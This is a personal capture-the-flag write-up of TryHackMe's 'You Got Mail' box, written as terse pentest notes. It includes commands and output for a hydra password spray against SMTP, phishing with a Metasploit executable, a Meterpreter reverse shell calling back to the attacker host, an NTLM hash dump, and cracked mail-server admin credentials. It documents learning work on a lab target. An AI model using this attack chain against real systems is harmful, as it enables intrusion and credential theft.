Try Hack Me’s Challenge Box: You Got Mail was a new one to Try Hack Me and it piqued my interest. So I decided to start working on Try Hack Me’s boxes. Below you will find the notes that I documented over the course of the three days, (2.5hrs total spent actually working on the box) that I spent attacking Try Hack Me’s: You Got Mail. I found it to be a succinct box that helped me learn new tools and learn to adapt as quickly as possible to unknowns.
Scope Details
- Active Pentesting allowed: 10.10.206.208
- Passive recon allowed: https://brownbrick.co/
Enumeration
10.10.145.3
Nmap Scan
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 syn-ack ttl 125 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 hMailServer imapd
|_imap-capabilities: QUOTA IDLE IMAP4rev1 completed CAPABILITY OK RIGHTS=texkA0001 IMAP4 NAMESPACE ACL CHILDREN SORT
445/tcp open microsoft-ds? syn-ack ttl 125
587/tcp open smtp syn-ack ttl 125 hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
RDP - 3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BRICK-MAIL
| Issuer: commonName=BRICK-MAIL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-15T20:59:24
| Not valid after: 2025-08-17T20:59:24
| MD5: 8456:a61c:4afe:248b:2176:02be:4f0b:8b75
| SHA-1: 8a81:5989:0cc1:41ae:1957:4f00:ec0a:d965:70d7:e52e
| -----BEGIN CERTIFICATE-----
| MIIC2DCCAcCgAwIBAgIQYGJmzHtDaKZGLMSXQ/FIUzANBgkqhkiG9w0BAQsFADAV
| MRMwEQYDVQQDEwpCUklDSy1NQUlMMB4XDTI1MDIxNTIwNTkyNFoXDTI1MDgxNzIw
| NTkyNFowFTETMBEGA1UEAxMKQlJJQ0stTUFJTDCCASIwDQYJKoZIhvcNAQEBBQAD
| ggEPADCCAQoCggEBAMLr/gEMLIpA2dR7l93i93xzCcP855bhwX6Iy448ySqHZ4vg
| sEk5nkjsYRE8uD4MX455jEd5wKMeazLYzHnuK8QJ3gK/Mf/lmiXiP1j4ZwmrOxtO
| uV2KijfysdAlrwpmtabXVTBqgWA5VRt16rO9Bqm4G+0vPKKU5p3tSdza4L36oyMo
| lWw/AB82L1NEVhLahzIvFLQPAE0zRrYLfGV6pYKBa+3iL++RHu4sQm5+S5plqWM7
| sZV7YjecqjAEeL6vS0GI+QHzV9XTz63OZ89n6CnBljNckw4ihIe5dEAXF78ZOy3x
| NkR7lZKPKkNr3NOXj4yludgSmiYAbgYPX12imOECAwEAAaMkMCIwEwYDVR0lBAww
| CgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQDBfHRZ
| jkBcsD7OAfgLHRfF+2Wf1TMz8rqyxi+VnwRtvkDbe7R7eWSraPaGNWc/iQGfA7hx
| o3gBg0nJsRjx88CJGFdPgq+fdYmftF9qv6PLSBgY5tq2qcGmfJPIhGUXcoRosi0G
| tmTEh7I3CslbWGlYG1/JwFQgTRDAQM0zgOs9yEagpNR1AsqlZTxRp0XDzHAO+VPw
| /TcczSWCz1Q9hhMoCyhkuzwpSil6Mz4YfeLvQ1uXix1gheChtrAthw2SxLM0uFFA
| El/zTu3NtIiQva/06rgWFH7TBYyDSn+YBHfVt+ydmnZKi5M/bwZi2bKTJjtdIs3H
| f3FUAMrebAzm0MD9
|_-----END CERTIFICATE-----
SMTP(25)
25/tcp open smtp syn-ack ttl 125 hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
- Attempted password spraying with user lists using both
rockyou.txtand custom passwords scraped withcewlbut were unsuccessful. - Erm Actually I just needed to use
--lowercaseflag with cewl.
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ sudo cewl <https://brownbrick.co> --lowercase > custom_password2.txt
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ hydra -L users.txt -P custom_password2.txt mail.thm smtp -V -I
Valid user login
[25][smtp] host: mail.thm login: lhedvig@brownbrick.co password: bricks
┌──(kali㉿kali)-[~/tryhackme/mail]
└─$ telnet mail.thm 110
Trying 10.10.183.71...
Connected to mail.thm.
Escape character is '^]'.
+OK POP3
user oaurelius
+OK Send your password
-ERR Invalid command in current state.
- Possible login
SMB (136,139,445)
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\mail.thm
Password for [WORKGROUP\\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
brownbrick.co
username enumeration
Omar Aurelius
Winifred Rohit
- What’s this dunce’s password?
Laird Hedvig
bricks
Titus Chikondi
Pontos Cathrine
Filimena Stamatis
Post Compromise
- Attempting to use
remminato connect to mail.thm through smtp. - Attempting to swipe email through
evolution
- No emails intercepted but phishing emails can be sent, maybe I can steal hashes with
Responder
- Sending a phishing email through evolution with a
Metasploitmade .exe - Had to update the SMTP Port to port 25, and enable auth
Post Exploitation
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.80.213:1338
[*] Sending stage (177734 bytes) to 10.10.145.3
[*] Meterpreter session 1 opened (10.13.80.213:1338 -> 10.10.145.3:49862) at 2025-02-19 22:41:01 -0500
meterpreter > getuid
Server username: BRICK-MAIL\\wrohit
- I have taken over user wrohit’s account using a
Meterpreterreverse shell made byMetasploit
wrohit:1014:aad3b435b51404eeaad3b435b51404ee:8458995f1d0a4b0c107fb8e23362c814:::
- Using Hash dump I collected wrohit’s password.
superstar
- Using hashcat I cracked the password
C:\\Program Files (x86)\\hMailServer\\Bin>type hMailServer.INI
type hMailServer.INI
[Directories]
ProgramFolder=C:\\Program Files (x86)\\hMailServer
DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database
DataFolder=C:\\Program Files (x86)\\hMailServer\\Data
LogFolder=C:\\Program Files (x86)\\hMailServer\\Logs
TempFolder=C:\\Program Files (x86)\\hMailServer\\Temp
EventFolder=C:\\Program Files (x86)\\hMailServer\\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
[Database]
Type=MSSQLCE
Username=
Password=47f104fa02185e821a83b2cfa56cf4ec
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
- Admin Password
5f4dcc3b5aa765d61d8327deb882cf99Hashcat can crack this - Admin password:
password